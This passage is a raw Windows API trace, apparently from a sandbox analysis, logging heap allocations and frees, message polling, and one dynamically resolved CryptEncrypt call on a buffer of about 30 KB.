1 [0191.742] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.742] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0191.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7498) returned 0xbffdf8 [0191.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbffdf8 | out: hHeap=0x8a0000) returned 1 [0191.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.745] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.746] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0191.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0191.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0191.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0191.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd) returned 0x9bd588 [0191.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x9bd588, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0191.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.750] GetProcAddress (hModule=0x74f20000, lpProcName="CryptEncrypt") returned 0x74f4779b [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.750] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x7498, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x74a0) returned 1 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.752] CharLowerBuffW (in: lpsz="byte[29857]", cchLength=0xb | out: lpsz="byte[29857]") returned 0xb [0191.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.754] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, 